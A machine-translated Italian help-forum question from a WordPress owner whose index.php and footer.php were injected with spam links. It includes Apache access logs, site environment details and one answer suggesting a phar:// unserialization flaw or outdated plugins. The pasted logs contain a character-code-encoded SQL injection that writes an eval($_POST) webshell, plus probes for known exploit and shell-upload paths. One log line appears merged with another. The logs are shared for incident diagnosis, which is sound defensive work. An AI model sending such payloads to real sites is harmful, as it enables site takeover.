Hacked Wordpress /index.php e /wp-content/themes/Avada/footer.php

Question

Hacked Wordpress /index.php e /wp-content/themes/Avada/footer.php

#1 da (1 voti)

2

Mi sono svegliato oggi per vedere le pagine in alto e in basso del mio sito web che mostravano un link con il testo "Cheap Jerseys Free Shipping".

Sono entrato rapidamente e ho visto che /index.php e /wp-content/themes/Avada/footer.php sono stati modificati, ho rimosso i collegamenti e salvato.

Voglio sapere in che modo la persona ha avuto accesso a entrambi i file in modo da poterla risolvere. Ho cercato ovunque, qualcuno può farmi sapere dove altro da guardare?

Ecco come appariva il mio index.php prima che lo risolvessi:

<a href="http://www.example.com">Cheap Jerseys Free Shipping</a>
<?php
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define('WP_USE_THEMES', true);

/** Loads the WordPress Environment and Template */
require( dirname( __FILE__ ) . '/wp-blog-header.php' );

Mi sono assicurato il mio sito Wordpress seguendo la guida di hardening di Wordpress. Il sito è ospitato su Amazon Lightsail.

Due utenti hanno accesso tramite SSH me con sudo e Vaultpress accesso limitato alla directory / web. L'accesso SSH è collegato all'e-mail istantanea notifica, non appena qualcuno accede tramite SSH e la posta elettronica viene inviata con IP, i registri di accesso mostrano che non è stato concesso alcun accesso ssh.
Due utenti FTP con accesso limitato in sola lettura a / web / download / e / web / solo directory di aggiornamento
Solo 1 utente su Wordpress, password ora cambiata. / wp-admin ha l'autorizzazione Consenti, nega Consenti da tutti Soddisfa qualsiasi e autenticazione della password in cui il file della password è in a .directory; AuthType Basic AuthName "Solo amministratori" AuthUserFile "/var/www/.xxx/xxxx/xxxxxx-xx-xxx" richiede utente valido wp-config.php in / directory ha ordine consentire, negare il rifiuto di tutti
Tutti gli accessi tramite firewall bloccati tranne ssh, 22, 80 e 443 L'accesso al database è limitato a solo local.
Google Tag Manager non è stato modificato e include solo link ad Analytics, Adwords e analisi dei clic specifici.

I log di accesso (accesso Web di Apache) che sembravano sospetti sono in basso, non so cosa significano. I backup dei backup di Vault mostrano che il cambiamento è avvenuto tra il 28 agosto (2:38 AM) e il 29 agosto (2:38 AM)

27.24.xx.xxx - - [27/Aug/2018:11:20:17 +0000] "GET /plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=97&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=114&arrs2[]=101&arrs2[]=97&arrs2[]=100&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=120&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=101&arrs2[]=99&arrs2[]=104&arrs2[]=111&arrs2[]=32&arrs2[]=109&arrs2[]=79&arrs2[]=111&arrs2[]=110&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=32&arrs2[]=87&arrs2[]=72&arrs2[]=69&arrs2[]=82&arrs2[]=69&arrs2[]=32&arrs2[]=96&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=49&arrs2[]=57&arrs2[]=32&arrs2[]=35 HTTP/1.1" 404 94621
27.24.xx.xxx - - [27/Aug/2018:11:20:23 +0000] "GET /plus/ad_js.php?aid=19 HTTP/1.1" 404 94621
27.24.xx.xxx - - [27/Aug/2018:11:20:31 +0000] "GET /include/dialog/select_soft_post.php HTTP/1.1" 404 94621
27.24.xx.xxx - - [27/Aug/2018:11:20:33 +0000] "GET /data/cache/asd.php HTTP/1.1" 404 94621
27.24.xx.xxx - - [27/Aug/2018:11:20:39 +0000] "GET /install/index.php.bak?step=11&insLockfile=a&s_lang=x&install_demo_name=../data/admin/config_update.php HTTP/1.1" 404 94621
27.24.xx.xxx - - [27/Aug/2018:11:20:41 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 94621
95.108.xxx.xx - - [27/Aug/2018:11:20:41 +0000] "GET /blog/xxx-xxx-xxxx-saves-lives/ HTTP/1.1" 200 103653
141.8.142.161 - - [27/Aug/2018:11:20:44 +0000] "GET /wp-content/themes/Avada/includes/lib/assets/fonts/fontawesome/webfonts/fa-solid-900.woff2 HTTP/1.1" 200 65580
95.108.xxx.xx - - [27/Aug/2018:11:20:44 +0000] "GET /blog/xxx-xxx-xxxx-saves-lives/?relatedposts=1 HTTP/1.1" 200 1426
27.24.21.214 - - [27/Aug/2018:11:20:44 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/asd.php HTTP/1.1" 404 94621
66.249.xxx.xx - - [27/Aug/2018:11:20:48 +0000] "GET /blog/xxx-xxx-xxxx-tool/ HTTP/1.1" 200 105062
27.24.xx.xxx - - [27/Aug/2018:11:20:51 +0000] "GET /index.php?m=member&c=index&a=register&siteid=1 HTTP/1.1" 301 5880
27.24.xx.xxx - - [27/Aug/2018:11:20:53 +0000] "GET /?m=member&c=index&a=register&siteid=1 HTTP/1.1" 200 95434
27.24.xx.xxx - - [27/Aug/2018:11:20:57 +0000] "GET /search.php HTTP/1.1" 404 94621
27.24.xx.xxx - - [27/Aug/2018:11:21:01 +0000] "GET / HTTP/1.1" 200 103770
27.24.xx.xxx - - [27/Aug/2018:11:21:07 +0000] "GET /index.php?s=/Core/File/uploadPictureBase64.html HTTP/1.1" 200 97157
27.24.xx.xxx - - [27/Aug/2018:11:21:26 +0000] "GET /install.php?finish=1 HTTP/1.1" 404 94621
27.24.xx.xxx - - [27/Aug/2018:11:21:29 +0000] "GET /da.php HTTP/1.1" 404 94621
27.24.xx.xxx - - [27/Aug/2018:11:21:36 +0000] "GET /dayrui/libraries/Chart/ofc_upload_image.php?name=shell9257.php HTTP/1.1" 404 94621
27.24.xx.xxx - - [27/Aug/2018:11:21:43 +0000] "GET /dayrui/libraries/tmp-upload-images/shell9257.php HTTP/1.1" 404 94621

128.77.xxx.xxx - - [29/Aug/2018:10:31:25 +0000] "GET /index.php?cperpage=1 HTTP/1.1" 301 510
128.77.xxx.xxx - - [29/Aug/2018:10:31:27 +0000] "GET /?cperpage=1 HTTP/1.1" 200 98345
128.77.xxx.xxx - - [29/Aug/2018:10:31:33 +0000] "GET /index.php?cperpage=1 HTTP/1.1" 301 510
128.77.xxx.xxx - - [29/Aug/2018:10:31:35 +0000] "GET /?cperpage=1 HTTP/1.1" 200 98330
128.77.xxx.xxx - - [29/Aug/2018:10:31:40 +0000] "GET /wp-admin HTTP/1.1" 401 735
80.122.xx.xx - - [29/Aug/2018:10:31:42 +0000] "GET / HTTP/1.1" 200 103865
66.249.xx.xxx - - [29/Aug/2018:10:31:49 +0000] "GET /robots.txt HTTP/1.1" 200 6059
80.122.xx.xxx - - [29/Aug/2018:10:31:49 +0000] "GET /index.php?cperpage=1 HTTP/1.1" 301 510
66.249.xx.xxx - - [29/Aug/2018:10:31:50 +0000] "GET /blog/author/scott-baird/ HTTP/1.1" 301 553
80.122.xx.xx - - [29/Aug/2018:10:31:51 +0000] "GET /?cperpage=1 HTTP/1.1" 200 98482
80.122.xx.xx - - [29/Aug/2018:10:31:57 +0000] "GET /index.php?cperpage=1 HTTP/1.1" 301 510
80.122.xx.xx - - [29/Aug/2018:10:31:59 +0000] "GET /?cperpage=1 HTTP/1.1" 200 98478
80.122.xx.xx - - [29/Aug/2018:10:32:03 +0000] "GET /wp-admin HTTP/1.1" 401 735
95.105.xxx.xxx - - [29/Aug/2018:10:32:15 +0000] "GET / HTTP/1.1" 200 103705
95.105.xxx.xxx - - [29/Aug/2018:10:32:27 +0000] "GET /index.php?cperpage=1 HTTP/1.1" 301 5879
95.105.xxx.xxx - - [29/Aug/2018:10:32:27 +0000] "GET / HTTP/1.1" 200 103701
95.105.xxx.xxx - - [29/Aug/2018:10:32:30 +0000] "GET /?cperpage=1 HTTP/1.1" 200 98347
95.105.xxx.xxx - - [29/Aug/2018:10:32:35 +0000] "GET /index.php?cperpage=1 HTTP/1.1" 301 510
95.105.xxx.xxx - - [29/Aug/2018:10:32:37 +0000] "GET /?cperpage=1 HTTP/1.1" 200 98325
95.105.xxx.xxx - - [29/Aug/2018:10:32:41 +0000] "GET /index.php?cperpage=1 HTTP/1.1" 301 510
95.105.xxx.xxx - - [29/Aug/2018:10:32:43 +0000] "GET /index.php?cperpage=1 HTTP/1.1" 301 5879
192.0.xxx.xxx - - [29/Aug/2018:10:32:44 +0000] "HEAD / HTTP/1.1" 200 5846
95.105.xxx.xxx - - [29/Aug/2018:10:32:43 +0000] "GET /?cperpage=1 HTTP/1.1" 200 98332
95.105.xxx.xxx - - [29/Aug/2018:10:32:49 +0000] "GET /wp-admin HTTP/1.1" 401 735
95.105.xxx.xxx - - [29/Aug/2018:10:32:45 +0000] "GET /?cperpage=1 HTTP/1.1" 200 98325
95.105.xxx.xxx - - [29/Aug/2018:10:32:51 +0000] "GET /wp-admin HTTP/1.1" 401 735
77.72.xxx.xxx - - [29/Aug/2018:10:33:12 +0000] "POST /wp-login.php HTTP/1.1" 200 10257
60.191.xxx.xxx - - [29/Aug/2018:10:33:17 +0000] "GET / HTTP/1.1" 200 84011/wp-admin/tools.php?page=string-locator&edit-file=index.php&file-reference=&file-type=core&string-locator-line=1&string-locator-path=%2Fvar%2Fwww%2Fmy-site%2Findex.php HTTP/1.1" 200 19947
119.my.ip - [email protected] [29/Aug/2018:14:38:17 +0000] "GET /wp-admin/load-styles.php?c=0&dir=ltr&load%5B%5D=dashicons,admin-bar,common,forms,admin-menu,dashboard,list-tables,edit,revisions,media,themes,about,nav-menus,wp-pointer,widgets&load%5B%5D=,site-icon,l10n,buttons,wp-auth-check,wp-jquery-ui-dialog,wp-color-picker,code-editor&ver=4.9.8 HTTP/1.1" 200 86794
119.my.ip - - [29/Aug/2018:14:38:17 +0000] "GET /wp-content/plugins/string-locator//resources/js/string-locator.js?ver=2.3.1 HTTP/1.1" 200 1119
119.my.ip - [email protected] [29/Aug/2018:14:38:17 +0000] "GET /wp-admin/load-scripts.php?c=0&load%5B%5D=jquery-core,jquery-migrate,utils,jquery-ui-core,jquery-ui-widget,jquery-ui-mouse,jquery-ui-sortable,underscore,wp-codemirror&ver=4.9.8 HTTP/1.1" 200 238028
119.my.ip - - [29/Aug/2018:14:38:20 +0000] "GET /wp-json/jetpack/v4/jitm?message_path=wp%3Atools_page_string-locator%3Aadmin_notices&query=page%253Dstring-locator%252Cedit-file%253Dindex.php%252Cfile-reference%253D%252Cfile-type%253Dcore%252Cstring-locator-line%253D1%252Cstring-locator-path%253D%25252Fvar%25252Fwww%25252Fmy-site%25252Findex.php&_wpnonce=e419c5f949 HTTP/1.1" 200 819
119.my.ip - [email protected] [29/Aug/2018:14:37:55 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 880
161.249.xxx.xx - - [29/Aug/2018:14:38:51 +0000] "-" 408 152
119.my.ip - [email protected] [29/Aug/2018:14:39:20 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 795
119.my.ip - [email protected] [29/Aug/2018:15:07:02 +0000] "GET /wp-admin/index.php HTTP/1.1" 200 25953

Le mie informazioni sul sito wordpress

Avada Versions: 

### Avada Versions ###

Current Version: 5.6.2
Previous Version: 5.5.2  5.6.0  5.6.1

### WordPress Environment ###

Home URL: https://www.my-site.com
Site URL: https://www.my-site.com
WP Content Path: /var/www/my-site/wp-content
WP Path: /var/www/my-site/
WP Version: 4.9.8
WP Multisite: –
PHP Memory Limit: 512 MB
WP Debug Mode: –
Language: en_US

### Server Environment ###

Server Info: Apache/2.4.18 (Ubuntu)
PHP Version: 7.0.30-0ubuntu0.16.04.1. WordPress recommendation: 7.2 or above. See WordPress Requirements for details.
PHP Post Max Size: 32 MB
PHP Time Limit: 0
PHP Max Input Vars: 3000

MySQL Version: 5.7.23
Max Upload Size: 20 MB
DOMDocument: ✔
WP Remote Get: ✔
WP Remote Post: ✔
GD Library: 2.1.1

## Active Plugins (11) ###

VaultPress: by Automattic
LayerSlider WP: by Kreatura Media
Akismet Anti-Spam: by Automattic
Contact Form 7 - ZOHO CRM: by Obtain Code
Contact Form 7: by Takayuki Miyoshi
Fusion Builder: by ThemeFusion
Fusion Core: by ThemeFusion
Jetpack by WordPress.com: by Automattic
Slider Revolution: by ThemePunch
Yoast SEO Premium: by Team Yoast
WP Mail SMTP: by WPForms

php access-control wordpress vulnerability file-access

posta Waqas Tariq 29.08.2018 - 21:39

fonte

1 risposta

Leggi altre domande sui tag php access-control wordpress vulnerability file-access

C'è un rischio nel riavviare uno smartphone mentre è collegato a una porta USB sconosciuta? Come offuscare il tunnel SSH Mac?

score 1 · Answer 1

Il tuo sito è stato probabilmente attaccato usando l'ultimo Vulnerabilità PHP su Operazione di file indotta da unserialization tramite phar: // Stream Wrapper . In breve, è possibile caricare sul server un archivio Phar valido e attivare un'operazione di file su quel file.

Se questa non era la strada usata, controlla se qualcuno dei tuoi plug-in è obsoleto, sono i principali sospettati su ogni compromesso Wordpress. Puoi installare WP Scan sul tuo computer ed eseguirlo sul tuo blog. Se nessun plugin non viene aggiornato, WP Scan ti mostrerà.